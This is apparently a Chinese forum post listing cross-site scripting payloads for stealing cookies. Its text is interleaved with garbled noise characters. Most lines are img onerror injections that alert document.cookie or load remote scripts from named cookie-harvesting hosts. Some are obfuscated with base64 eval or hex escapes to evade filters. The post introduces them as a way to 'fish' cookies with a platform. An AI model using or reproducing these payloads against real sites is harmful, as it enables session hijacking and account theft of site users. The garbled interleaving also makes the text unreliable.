<img src='non-exist.jpg'onerror="alert('xss')">
, a- L, r9 C9 _. h<img src=# onerror=alert(123)>
4 b4 A( z: |) |0 r- L# G; y, b6 C<img src=# onerror=alert(document.cookie)>* u8 j# O1 W. B3 b3 |, S
下面是利用平台钓cookie的
+ J& @& G# I* ~4 ?" b! x# F" ` <img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>) i* x- B }1 c) C
( }- x2 r- E2 G) A- X
1 @) z% S( t9 k3 e5 c- d9 Y! e' f
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>9 \6 L. K$ G! t, ?4 n7 p- p
<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>
% g% l0 p2 [+ ]( {4 W“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>; {3 e% U y5 S7 R6 m: H l& l/ k
<img src=1 onerror=jQuery.getScript("//xss.re/974")>
7 y( B2 o v0 n5 @/ \1 e' A<img src="#">: z) e# d+ A" N8 q. G6 t# x9 R) V) o/ T
<img src="#"> y' K6 i: i( v! o7 q
<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>
5 B1 L$ a$ `3 {! ^* b9 a% D4 |<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0"> P" ?2 I$ V R; Q4 p; z! b
<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>4 ]* Z( {6 G0 f+ m3 Q
<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>5 `# Z, V, f2 K! D) s/ R
<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>
U' H$ r) {* p! Q: R7 C<img src=x width="0" height="0"></img>
: t. ]0 {! V& X. E, _& j3 J8 P: e<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>% t* c, Y; b8 L
<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>8 p' s, h6 L7 T+ W9 V5 n- U' K
|
发表于 2015-10-18 14:33:54
收藏
支持
反对